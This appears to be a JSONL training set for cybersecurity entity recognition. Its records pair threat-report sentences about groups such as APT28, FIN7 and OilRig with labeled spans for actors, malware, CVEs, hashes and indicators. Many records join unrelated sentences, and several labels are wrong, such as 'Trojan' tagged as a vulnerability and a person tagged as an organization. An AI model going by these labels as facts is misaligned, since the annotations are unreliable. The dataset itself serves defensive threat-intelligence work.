{"text": "Allows applications to open network sockets . The CIA's Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones . A portion of FIN7 was run out of a front company called Combi Security .", "spans": {"THREAT_ACTOR: CIA's": [[50, 55]], "THREAT_ACTOR: FIN7": [[176, 180]], "ORGANIZATION: Combi Security": [[219, 233]]}, "info": {"id": "cyberner_stix_train_001022", "source": "cyberner_stix_train"}}
{"text": "As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . Once an exploitable page is identified , the actor will attempt to upload a PHP backdoor to gain remote access to the system .", "spans": {"MALWARE: AutoHotKey scripts": [[66, 84]]}, "info": {"id": "cyberner_stix_train_001023", "source": "cyberner_stix_train"}}
{"text": "To date , all observed Snake Wine 's attacks were the result of spear phishing attempts against the victim organizations . Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails .", "spans": {"THREAT_ACTOR: Snake Wine": [[23, 33]], "ORGANIZATION: Group-IB": [[123, 131]], "TOOL: email": [[164, 169]], "ORGANIZATION: bank": [[186, 190]], "ORGANIZATION: employees": [[191, 200]], "TOOL: emails": [[236, 242]]}, "info": {"id": "cyberner_stix_train_001024", "source": "cyberner_stix_train"}}
{"text": "Also , Bookworm uses a combination of encryption and compression algorithms to obfuscate the traffic between the system and C2 server . After the initial compromise , TG-3390 delivers the HTTPBrowser backdoor to its victims .", "spans": {"TOOL: Bookworm": [[7, 15]], "THREAT_ACTOR: TG-3390": [[167, 174]], "MALWARE: HTTPBrowser backdoor": [[188, 208]]}, "info": {"id": "cyberner_stix_train_001025", "source": "cyberner_stix_train"}}
{"text": "the Android platform have received media attention . Active since 2012 , it has so far targeted Taiwanese government agencies and private organizations . This is used in some of the newer 3.22 and 3.39 samples . In addition , more ransomware gangs are attacking targets multiple times a month : the number of groups carrying out more than one known attack per month in the UK has climbed steadily for a year , from just one in July 2022 to eight in June 2023 .", "spans": {"SYSTEM: Android": [[4, 11]], "ORGANIZATION: government agencies": [[106, 125]], "THREAT_ACTOR: ransomware gangs": [[231, 247]]}, "info": {"id": "cyberner_stix_train_001026", "source": "cyberner_stix_train"}}
{"text": "In some cases , the decompilation process will fail , and “ Agent Smith ” will try another method for infecting the original application – A binary patch , which simply provides a binary file of the “ boot ” module of “ Agent Smith ” . Buhtrap is getting better at disguising the code they inject into compromised websites . The said obfuscated script is designed to check for antivirus products . While FakeSG appears to be a newcomer , it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival with SocGholish .", "spans": {"MALWARE: Agent Smith": [[60, 71], [220, 231]], "THREAT_ACTOR: Buhtrap": [[236, 243]], "TOOL: compromised websites": [[302, 322]]}, "info": {"id": "cyberner_stix_train_001027", "source": "cyberner_stix_train"}}
{"text": "A ptrace_attach syscall is called . The objective of the attacks is clearly espionage – they involve gaining access to top legislative , executive and judicial bodies around the world . The malware then communicates directly with the retrieved and decoded IP address to receive commands and send stolen information . Once they are downloaded to the machine , they can fetch a larger backdoor which carries out the cyberespionage activities , through functions such as copy file , move file , remove file , make directory , kill process and of course , download and execute new malware and lateral movement tools .", "spans": {"THREAT_ACTOR: the cyberespionage activities": [[410, 439]]}, "info": {"id": "cyberner_stix_train_001028", "source": "cyberner_stix_train"}}
{"text": "The cryptominer employed by Pacha Group , labeled Linux.GreedyAntd by Intezer , was completely undetected by all leading engines , demonstrating the sophistication of this malware . A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus .", "spans": {"TOOL: Linux.GreedyAntd": [[50, 66]], "ORGANIZATION: Intezer": [[70, 77]], "ORGANIZATION: employees": [[363, 372]], "ORGANIZATION: financial entities": [[378, 396]]}, "info": {"id": "cyberner_stix_train_001029", "source": "cyberner_stix_train"}}
{"text": "Symantec has had the following protections in place to protect customers against APT28 attacks :", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: APT28": [[81, 86]]}, "info": {"id": "cyberner_stix_train_001030", "source": "cyberner_stix_train"}}
{"text": "The theme also reflects the targeting of the group which primarily focuses on NATO members , countries in Central Asia and those neighboring Russia .", "spans": {"ORGANIZATION: NATO": [[78, 82]]}, "info": {"id": "cyberner_stix_train_001031", "source": "cyberner_stix_train"}}
{"text": "iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives .", "spans": {"ORGANIZATION: iSiGHT Partners": [[0, 15]], "THREAT_ACTOR: Sandworm Team": [[28, 41]], "VULNERABILITY: zero-day exploit": [[163, 179]], "VULNERABILITY: CVE-2014-4114": [[182, 195]], "THREAT_ACTOR: Poseidon Group": [[202, 216]], "ORGANIZATION: executives": [[386, 396]]}, "info": {"id": "cyberner_stix_train_001032", "source": "cyberner_stix_train"}}
{"text": "We were also able to analyze some GolfSpy samples sourced from the Trend Micro mobile app reputation service . Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . In 2018-2019 , researchers of Kaspersky Lab ’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures ( TTPs ) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests . \" Having infected gaming companies that do business in MMORPG , the attackers potentially get access to millions of users , \" the researchers wrote .", "spans": {"MALWARE: GolfSpy": [[34, 41]], "ORGANIZATION: Trend Micro": [[67, 78]], "ORGANIZATION: Securelist": [[132, 142]], "VULNERABILITY: zero-day Adobe Flash Player exploit": [[172, 207]], "ORGANIZATION: Kaspersky": [[269, 278]], "ORGANIZATION: Global Research and Analysis Team": [[286, 319]], "THREAT_ACTOR: FIN7": [[420, 424]], "ORGANIZATION: gaming companies": [[550, 566]], "THREAT_ACTOR: attackers": [[600, 609]]}, "info": {"id": "cyberner_stix_train_001033", "source": "cyberner_stix_train"}}
{"text": "It is called KASPERAGENT based on PDB strings identified in the malware such as “ c : UsersUSADocumentsVisual Studio 2008ProjectsNew folder ( 2 ) kasperReleasekasper.pdb ” .", "spans": {"MALWARE: KASPERAGENT": [[13, 24]], "FILEPATH: c : UsersUSADocumentsVisual Studio 2008ProjectsNew folder ( 2 ) kasperReleasekasper.pdb": [[82, 169]]}, "info": {"id": "cyberner_stix_train_001034", "source": "cyberner_stix_train"}}
{"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]]}, "info": {"id": "cyberner_stix_train_001035", "source": "cyberner_stix_train"}}
{"text": "Reviving MuddyC3 Used by MuddyWater ( IRAN ) APT .", "spans": {"TOOL: MuddyC3": [[9, 16]], "THREAT_ACTOR: MuddyWater": [[25, 35]], "THREAT_ACTOR: IRAN": [[38, 42]]}, "info": {"id": "cyberner_stix_train_001037", "source": "cyberner_stix_train"}}
{"text": "While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences . The malware leverages an exploit , codenamed EternalBlue , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": {"ORGANIZATION: audiences": [[247, 256]], "VULNERABILITY: exploit": [[284, 291]], "VULNERABILITY: EternalBlue": [[304, 315]], "THREAT_ACTOR: Shadow Brokers": [[343, 357]]}, "info": {"id": "cyberner_stix_train_001038", "source": "cyberner_stix_train"}}
{"text": "Check Point Software So far , HummingBad has been observed using its highly privileged status only to engage in click fraud , display pop-up ads , tamper with Google Play , and install additional apps that do more of the same . Bankshot is designed to persist on a victim 's network for further exploitation ; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations . APT33 : 8.26.21.221 mynetwork.ddns.net . Further fields of interest in the XPdb had the prefix “ responsible _ ” and contained information about the parent of the process which violated the behavioral rules .", "spans": {"ORGANIZATION: Check Point Software": [[0, 20]], "MALWARE: HummingBad": [[30, 40]], "SYSTEM: Google Play": [[159, 170]], "TOOL: Bankshot": [[228, 236]], "ORGANIZATION: Advanced Threat Research": [[319, 343]], "ORGANIZATION: financial organizations": [[412, 435]], "THREAT_ACTOR: APT33": [[438, 443]], "IP_ADDRESS: 8.26.21.221": [[446, 457]], "DOMAIN: mynetwork.ddns.net": [[458, 476]], "SYSTEM: XPdb": [[513, 517]]}, "info": {"id": "cyberner_stix_train_001039", "source": "cyberner_stix_train"}}
{"text": "Scrub and verify all administrator accounts regularly .", "spans": {}, "info": {"id": "cyberner_stix_train_001040", "source": "cyberner_stix_train"}}
{"text": "Why Do Desktop Trojans Use a Mobile Component ? PUTTER PANDA are a determined adversary group who have been operating for several years , conducting intelligence-gathering operations with a significant focus on the space sector . This suggests that due to the January 2017 attack , the targeted organization may have taken actions to counter known OilRig TTPs , in this case delivering malicious macro documents , causing the OilRig operators to adopt a different delivery tactic .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[48, 60]], "THREAT_ACTOR: group": [[88, 93]], "ORGANIZATION: space sector": [[215, 227]], "THREAT_ACTOR: OilRig": [[348, 354], [426, 432]], "THREAT_ACTOR: operators": [[433, 442]]}, "info": {"id": "cyberner_stix_train_001041", "source": "cyberner_stix_train"}}
{"text": "We performed a more detailed analysis on this loader Trojan , which readers can view in this report ’s appendix .", "spans": {"VULNERABILITY: Trojan": [[53, 59]]}, "info": {"id": "cyberner_stix_train_001042", "source": "cyberner_stix_train"}}
{"text": "Pitty Tiger group is sometimes using stolen material as spear phishing content to target other persons . In September 2015 Mofang launched another attack .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[0, 17]], "THREAT_ACTOR: Mofang": [[123, 129]]}, "info": {"id": "cyberner_stix_train_001043", "source": "cyberner_stix_train"}}
{"text": "Once a matching intent is triggered , the respective Receiver code will be executed , leading to other HenBox behaviors being launched , which are described later . APT41 campaigns focused on the video game sector have largely affected studios and distributors in East and Southeast Asia , although global companies based in the United States have also been targeted . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": {"THREAT_ACTOR: APT41": [[165, 170]], "ORGANIZATION: video game sector": [[196, 213]], "ORGANIZATION: global companies": [[299, 315]], "THREAT_ACTOR: APT28": [[369, 374]], "ORGANIZATION: rockers": [[391, 398]], "ORGANIZATION: dissidents Pussy Riot": [[403, 424]], "TOOL: emails": [[444, 450]]}, "info": {"id": "cyberner_stix_train_001044", "source": "cyberner_stix_train"}}
{"text": "Execute a command through exploits for CVE-2017-11882 . The Winnti and Axiom group names were created by Kaspersky Lab and Symantec , respectively , for their 2013/2014 reports on the original group .", "spans": {"VULNERABILITY: CVE-2017-11882": [[39, 53]], "THREAT_ACTOR: Winnti": [[60, 66]], "ORGANIZATION: Kaspersky Lab": [[105, 118]], "ORGANIZATION: Symantec": [[123, 131]]}, "info": {"id": "cyberner_stix_train_001045", "source": "cyberner_stix_train"}}
{"text": "Others may have the necessary permissions , but are missing the classes containing the fraud code . Figure 9a , below , shows detections of encounters with the Barium actors and their infrastructure , including infected computers located in Virginia , and Figure 9b , below , shows detections of encounters throughout the United States . You can also select a host and type help for a full list of commands . • Identify and investigate the creation , transfer , and/or execution of unauthorized Python - packaged executables ( e.g. , PyInstaller or Py2Exe ) on OT systems or systems with access to OT resources .", "spans": {"TOOL: PyInstaller": [[534, 545]], "TOOL: Py2Exe": [[549, 555]], "SYSTEM: OT systems": [[561, 571]], "SYSTEM: systems with access to OT resources": [[575, 610]]}, "info": {"id": "cyberner_stix_train_001046", "source": "cyberner_stix_train"}}
{"text": "If one these commands is found , then the malware will encode the stolen data with Base64 and upload it to the command and control server . TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication . This volume chronicles two activity groups , code-named PROMETHIUM and NEODYMIUM , both of which target individuals in a specific LOC of Europe .", "spans": {"THREAT_ACTOR: TG-3390": [[140, 147]], "ORGANIZATION: CTU": [[196, 199]], "VULNERABILITY: zero-day exploits": [[254, 271]], "THREAT_ACTOR: activity groups": [[324, 339]], "THREAT_ACTOR: PROMETHIUM": [[353, 363]], "THREAT_ACTOR: NEODYMIUM": [[368, 377]]}, "info": {"id": "cyberner_stix_train_001047", "source": "cyberner_stix_train"}}
{"text": "The group has also targeted businesses operating in the South China Sea , which is a strategically important region and the focus of disputes between China and other states . To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts .", "spans": {"ORGANIZATION: businesses": [[28, 38]], "ORGANIZATION: CTU": [[272, 275]], "FILEPATH: cmd.exe": [[297, 304]]}, "info": {"id": "cyberner_stix_train_001048", "source": "cyberner_stix_train"}}
{"text": "FireEye has uncovered a malicious document sent in spear phishing emails to multiple companies in the hospitality industry , including hotels in at least seven European countries and one Middle Eastern country in early July .", "spans": {"ORGANIZATION: FireEye": [[0, 7]]}, "info": {"id": "cyberner_stix_train_001049", "source": "cyberner_stix_train"}}
{"text": "This is hardcoded and equals “ phone ” . In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . NEODYMIUM is an activity group that , like PROMETHIUM , conducted an attack campaign in early May 2016 .", "spans": {"VULNERABILITY: CVE-2011-3544": [[90, 103]], "TOOL: HTTPBrowser backdoor": [[171, 191]], "VULNERABILITY: CVE-2010-0738": [[198, 211]], "TOOL: JBoss": [[233, 238]], "THREAT_ACTOR: NEODYMIUM": [[354, 363]], "THREAT_ACTOR: PROMETHIUM": [[397, 407]]}, "info": {"id": "cyberner_stix_train_001050", "source": "cyberner_stix_train"}}
{"text": "We analyzed the kits , which were designed to steal information from the automotive and finance industries , launch subsequent attacks on already compromised systems , and ( possibly ) sell stolen information .", "spans": {}, "info": {"id": "cyberner_stix_train_001051", "source": "cyberner_stix_train"}}
{"text": "A couple of months later , in August 2019 , a new version was released with additional banking-specific features . Given that these attacks were mostly targeted against Asia and the gaming industry , it shouldn’t be surprising they are the work of the group described in Kaspersky’s Winnti – More than just a game” . Dust Storm is a threat group that has targeted multiple industries in Japan , South Korea , the United States , Europe , and several Southeast Asian countries .", "spans": {"ORGANIZATION: gaming industry": [[182, 197]], "ORGANIZATION: Kaspersky’s": [[271, 282]], "THREAT_ACTOR: Winnti": [[283, 289]], "THREAT_ACTOR: Dust Storm": [[317, 327]]}, "info": {"id": "cyberner_stix_train_001052", "source": "cyberner_stix_train"}}
{"text": "The other iOS app “ Concipit Shop ” from the same developer appeared normal and was last updated on November 2019 . During that time they poked 70 internal hosts , compromised 56 accounts , making their way from 139 attack sources ( TOR and compromised home routers ) . the code parses the structure in first blocks then reconnects each conditional blocks under the flattened blocks ( #1 and #2 as successors of #13 , There are three main subroutines : the first is launched when the document is opened ( e.g. , Auto_Open , Workbook_Open ) , the second creates a randomly named dynamic loading library ( DLL ) file in the user ’s temporary files folder , and the third creates a randomly named shortcut ( LNK ) file which contains code to run regsvr32.exe ( or rundll32.exe ) to launch the next stage .", "spans": {"SYSTEM: iOS": [[10, 13]]}, "info": {"id": "cyberner_stix_train_001053", "source": "cyberner_stix_train"}}
{"text": "In addition , at this stage the app can process one of these commands : • Collect device info • Install app • Is online ? APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training , maintenance and support for Saudi 's military and commercial fleet . Inside the binaries the compiler left references to the names of the C source file modules used: operation_reg.c , thread_command.c and thread_upload.c . What makes COSMICENERGY unique is that based on our analysis , a contractor may have developed it as a red teaming tool for simulated power disruption exercises hosted by Rostelecom - Solar , a Russian cyber security company .", "spans": {"THREAT_ACTOR: APT33": [[122, 127]], "ORGANIZATION: aviation companies": [[189, 207]], "TOOL: C": [[426, 427]], "FILEPATH: operation_reg.c": [[454, 469]], "FILEPATH: thread_command.c": [[472, 488]], "FILEPATH: thread_upload.c": [[493, 508]], "MALWARE: COSMICENERGY": [[522, 534]], "ORGANIZATION: Rostelecom - Solar": [[682, 700]], "ORGANIZATION: Russian cyber security company": [[705, 735]]}, "info": {"id": "cyberner_stix_train_001054", "source": "cyberner_stix_train"}}
{"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817461 [ . If the attackers were able to obtain one of these EPP keys , they would be able to modify any DNS records that were managed by that particular registrar . Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018 .", "spans": {"THREAT_ACTOR: attackers": [[73, 82]], "THREAT_ACTOR: Patchwork": [[221, 230]]}, "info": {"id": "cyberner_stix_train_001055", "source": "cyberner_stix_train"}}
{"text": "The app then uses JavaScript injection to create a new script in the carrier ’ s web page to run the new function . Bahamut targeted similar Qatar-based individuals during their campaign . The second Loveusd system thread does a lot of things . In other news , a suspected LockBit affiliate named Ruslan Magomedovich Astamirov , a 20 - year - old from the Chechen Republic , was arrested in Arizona last month .", "spans": {"THREAT_ACTOR: Bahamut": [[116, 123]], "TOOL: Loveusd": [[200, 207]], "THREAT_ACTOR: LockBit": [[273, 280]], "ORGANIZATION: Ruslan Magomedovich Astamirov": [[297, 326]]}, "info": {"id": "cyberner_stix_train_001056", "source": "cyberner_stix_train"}}
{"text": "PlugX — This remote access Trojan ( RAT ) is popular among PRC-based targeted threat groups .", "spans": {"MALWARE: PlugX": [[0, 5]], "MALWARE: Trojan": [[27, 33]], "ORGANIZATION: PRC-based": [[59, 68]]}, "info": {"id": "cyberner_stix_train_001057", "source": "cyberner_stix_train"}}
{"text": "To prevent this , Android ’ s engineers regularly release updates that contain bug fixes designed to prevent apps from getting the list of currently running apps without explicit permission . Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails . The Carbon Black Threat Analysis Unit ( TAU ) An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or , if the user has the browser extension enabled , by visiting a malicious web page :", "spans": {"SYSTEM: Android": [[18, 25]], "THREAT_ACTOR: APT37": [[244, 249]], "ORGANIZATION: The Carbon Black Threat Analysis Unit": [[314, 351]], "ORGANIZATION: TAU": [[354, 357]]}, "info": {"id": "cyberner_stix_train_001058", "source": "cyberner_stix_train"}}
{"text": "RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . In addition to the legitimate AmmyAdmin tool , the hackers used Visconti Backdoor developed based on legitimate RMS ( remote manipulator system ) software .", "spans": {"MALWARE: RIPPER": [[0, 6]], "ORGANIZATION: ATM vendors": [[77, 88]], "MALWARE: AmmyAdmin tool": [[173, 187]], "MALWARE: Visconti Backdoor": [[207, 224]], "TOOL: RMS": [[255, 258]], "TOOL: remote manipulator system": [[261, 286]]}, "info": {"id": "cyberner_stix_train_001059", "source": "cyberner_stix_train"}}
{"text": "This data , when analyzed with the number of commands to send SMSs that Talos received during the investigation , lead us to conclude that the malicious operator is aggressively spreading the malware , but that does n't seem to result in the same number of new infections . Observed APT10 targeting is in line with many of the historic compromises we have outlined previously as originating from China . Earlier today , Motherboard published a story by Kim Zetter on Operation ShadowHammer , a newly discovered supply chain attack that leveraged ASUS Live Update software . Although COSMICENERGY does not directly overlap with any previously observed malware families , its capabilities are comparable to those employed in previous incidents and malware .", "spans": {"THREAT_ACTOR: APT10": [[283, 288]], "ORGANIZATION: Motherboard": [[420, 431]], "TOOL: ASUS Live Update": [[546, 562]], "MALWARE: COSMICENERGY": [[583, 595]]}, "info": {"id": "cyberner_stix_train_001060", "source": "cyberner_stix_train"}}
{"text": "The implant provides the ability to grab a lot of exfiltrated data , like call records , text messages , geolocation , surrounding audio , calendar events , and other memory information stored on the device . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll” , Ext_server_extapi.x64.dll” , and Ext_server_espia.x64.dll” extensions . TEMP.Veles is a Russia based threat group that has targeted critical infrastructure .", "spans": {"MALWARE: Stageless Meterpreter": [[223, 244]], "MALWARE: Ext_server_stdapi.x64.dll”": [[253, 279]], "MALWARE: Ext_server_extapi.x64.dll”": [[282, 308]], "MALWARE: Ext_server_espia.x64.dll”": [[315, 340]], "THREAT_ACTOR: TEMP.Veles": [[354, 364]]}, "info": {"id": "cyberner_stix_train_001061", "source": "cyberner_stix_train"}}
{"text": "Until now , we haven ’ t seen targeted attacks against mobile phones , although we ’ ve seen indications that these were in development . Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . The primary operational technique used by Night Dragon comprised a variety of hacker tools , including privately developed and customized RAT tools that provided complete remote administration capabilities to the attacker .", "spans": {"TOOL: Confucius'": [[138, 148]], "VULNERABILITY: CVE-2015-1641": [[243, 256]], "VULNERABILITY: CVE-2017-11882": [[261, 275]], "THREAT_ACTOR: Night Dragon": [[320, 332]], "MALWARE: RAT tools": [[416, 425]], "THREAT_ACTOR: attacker": [[491, 499]]}, "info": {"id": "cyberner_stix_train_001062", "source": "cyberner_stix_train"}}
{"text": "The threat actors create PlugX DLL stub loaders that will run only after a specific date .", "spans": {"MALWARE: PlugX": [[25, 30]], "TOOL: DLL": [[31, 34]], "TOOL: loaders": [[40, 47]]}, "info": {"id": "cyberner_stix_train_001063", "source": "cyberner_stix_train"}}
{"text": "Calling functionality Command PHOCAs7 initiates calling functionality . The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . compromised credentials to log into a victim ’s remote access infrastructure .", "spans": {"ORGANIZATION: Symantec": [[121, 129]], "VULNERABILITY: (CVE-2019-0703)": [[130, 145]]}, "info": {"id": "cyberner_stix_train_001064", "source": "cyberner_stix_train"}}
{"text": "This sort of conversion allows Python code to be run in a Windows environment without pre-installed Python binaries . The attackers were meticulous in making their phishing page as credible as possible . Rancor uses politically-motivated lures to entice victims to open malicious documents .", "spans": {"SYSTEM: Python": [[31, 37], [100, 106]], "SYSTEM: Windows": [[58, 65]], "THREAT_ACTOR: attackers": [[122, 131]], "THREAT_ACTOR: Rancor": [[204, 210]], "TOOL: politically-motivated lures": [[216, 243]]}, "info": {"id": "cyberner_stix_train_001065", "source": "cyberner_stix_train"}}
{"text": "05edd53508c55b9dd64129e944662c0d 1cf5ce3e3ea310b0f7ce72a94659ff54 352eede25c74775e6102a095fb49da8c 3b595d3e63537da654de29dd01793059 4709395fb143c212891138b98460e958 50f4464d0fc20d1932a12484a1db4342 96c317b0b1b14aadfb5a20a03771f85f ba7b1392b799c8761349e7728c2656dd de5057e579be9e3c53e50f97a9b1832b e7d92039ffc2f07496fe7657d982c80f e864f32151d6afd0a3491f432c2bb7a2 .", "spans": {"FILEPATH: 05edd53508c55b9dd64129e944662c0d": [[0, 32]], "FILEPATH: 1cf5ce3e3ea310b0f7ce72a94659ff54": [[33, 65]], "FILEPATH: 352eede25c74775e6102a095fb49da8c": [[66, 98]], "FILEPATH: 3b595d3e63537da654de29dd01793059": [[99, 131]], "FILEPATH: 4709395fb143c212891138b98460e958": [[132, 164]], "FILEPATH: 50f4464d0fc20d1932a12484a1db4342": [[165, 197]], "FILEPATH: 96c317b0b1b14aadfb5a20a03771f85f": [[198, 230]], "FILEPATH: ba7b1392b799c8761349e7728c2656dd": [[231, 263]], "FILEPATH: de5057e579be9e3c53e50f97a9b1832b": [[264, 296]], "FILEPATH: e7d92039ffc2f07496fe7657d982c80f": [[297, 329]], "FILEPATH: e864f32151d6afd0a3491f432c2bb7a2": [[330, 362]]}, "info": {"id": "cyberner_stix_train_001066", "source": "cyberner_stix_train"}}
{"text": "In some observed cases , these executables were self-extracting archive files containing common hacking tools , such as PSExec and Mimikatz , combined with script files that execute these tools .", "spans": {"TOOL: PSExec": [[120, 126]], "TOOL: Mimikatz": [[131, 139]]}, "info": {"id": "cyberner_stix_train_001067", "source": "cyberner_stix_train"}}
{"text": "TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany March 24 , 2020 IBM X-Force researchers analyzed an Android malware app that ’ s likely being pushed to infected users by the TrickBot Trojan . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . We first discovered this group in mid-2016 , although it is possible their operations extends earlier than that time frame .", "spans": {"MALWARE: TrickBot": [[0, 8], [189, 197]], "ORGANIZATION: IBM X-Force": [[79, 90]], "SYSTEM: Android": [[115, 122]], "VULNERABILITY: CVE-2018-0798": [[207, 220]], "THREAT_ACTOR: threat actor": [[298, 310]]}, "info": {"id": "cyberner_stix_train_001068", "source": "cyberner_stix_train"}}
{"text": "Kaspersky Lab has produced excellent research on Scarlet Mimic group . An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "THREAT_ACTOR: Scarlet Mimic group": [[49, 68]], "THREAT_ACTOR: Ajax Security": [[111, 124]], "THREAT_ACTOR: Flying Kitten": [[140, 153]], "ORGANIZATION: CrowdStrike": [[159, 170]], "ORGANIZATION: dissidents": [[225, 235]]}, "info": {"id": "cyberner_stix_train_001069", "source": "cyberner_stix_train"}}
{"text": "Although the propagation trend seems to be slowing down a bit , the figure tells us that RuMMS malware is still alive in the wild . Since May 2016 , we have continued to monitor and uncover various attacks and tools associated with the OilRig group . The decoded binary filename is also randomly generated based on a dictionary : Array(\"proc\" , \"chrome\" , \"winrar\") . None Ensure X - Forwarded - For header is configured to log true external IP addresses for request to proxied services .", "spans": {"MALWARE: RuMMS": [[89, 94]], "THREAT_ACTOR: OilRig group": [[236, 248]]}, "info": {"id": "cyberner_stix_train_001070", "source": "cyberner_stix_train"}}
{"text": "This sample is a modified version of Quasar , most likely forked from open source version 1.2.0.0 on GitHub .", "spans": {"MALWARE: Quasar": [[37, 43]]}, "info": {"id": "cyberner_stix_train_001071", "source": "cyberner_stix_train"}}
{"text": "This data is immediately sent to the cybercriminals and the computer displays the QR code containing a link to the alleged certificate of the online banking system . It is not a new tactic for Turla to rely on fake Flash installers to try to trick the user to install one of their backdoors . ZxShell has been observed to be distributed through phishing attacks , dropped by exploits that leverage vulnerabilities such as CVE-2011-2462 , CVE-2013-3163 , and CVE-2014-0322 . In each case , CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022 - 41040 for initial access .", "spans": {"TOOL: fake Flash installers": [[210, 231]], "MALWARE: ZxShell": [[293, 300]], "VULNERABILITY: CVE-2011-2462": [[422, 435]], "VULNERABILITY: CVE-2013-3163": [[438, 451]], "VULNERABILITY: CVE-2014-0322": [[458, 471]], "VULNERABILITY: CVE-2022 - 41040": [[584, 600]]}, "info": {"id": "cyberner_stix_train_001072", "source": "cyberner_stix_train"}}
{"text": "The ‘ onload3 ’ function will take the response to the HTTP request in ‘ onload2 ’ and treat it as the payload .", "spans": {}, "info": {"id": "cyberner_stix_train_001073", "source": "cyberner_stix_train"}}
{"text": "This efficiency of operation ( a 1:1 ratio of operator to observed activity ) suggests that TG-3390 can scale to conduct the maximum number of simultaneous operations .", "spans": {"THREAT_ACTOR: TG-3390": [[92, 99]]}, "info": {"id": "cyberner_stix_train_001074", "source": "cyberner_stix_train"}}
{"text": "Port 6212 : Chrome extraction service . Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed . APA S-IDTY adopted resolution Unlimited support for Palestinian people.docx : We can not independently confirm KillMilk 's claims of having previous affiliation with the hacktivist group Universal Dark Service .", "spans": {"SYSTEM: Chrome": [[12, 18]], "TOOL: Nidiran": [[73, 80]], "TOOL: self-extracting executable": [[104, 130]], "MALWARE: .tmp": [[165, 169]], "FILEPATH: APA S-IDTY adopted resolution Unlimited support for Palestinian people.docx": [[206, 281]]}, "info": {"id": "cyberner_stix_train_001075", "source": "cyberner_stix_train"}}
{"text": "This module injects code into running Google Play or GMS ( Google Mobile Services ) to mimic user behavior so Gooligan can avoid detection , a technique first seen with the mobile malware HummingBad . Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . in microcode . Anonymous Sudan", "spans": {"SYSTEM: Google Play": [[38, 49]], "SYSTEM: GMS ( Google Mobile Services )": [[53, 83]], "MALWARE: Gooligan": [[110, 118]], "MALWARE: HummingBad": [[188, 198]], "ORGANIZATION: Kaspersky": [[201, 210]], "THREAT_ACTOR: group": [[221, 226]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[244, 285]], "VULNERABILITY: CVE-2016-4117": [[288, 301]], "TOOL: FinSpy": [[348, 354]], "THREAT_ACTOR: Anonymous Sudan": [[430, 445]]}, "info": {"id": "cyberner_stix_train_001076", "source": "cyberner_stix_train"}}
{"text": "In some samples , Bread has simply directly called the Reflect API on strings decrypted at runtime . Nearly a month later , security experts are now shining a bright light on the alert and the mysterious group behind the attack . The implementation is a userland keylogger that polls the keymap with each keystroke . Notably , the Telegram channel in which actors claiming to be from REvil claimed links with KillNet had been created only days before the operation began on June 15 , 2023 .", "spans": {"MALWARE: Bread": [[18, 23]], "TOOL: keylogger": [[263, 272]], "SYSTEM: Telegram channel": [[331, 347]], "THREAT_ACTOR: REvil": [[384, 389]]}, "info": {"id": "cyberner_stix_train_001077", "source": "cyberner_stix_train"}}
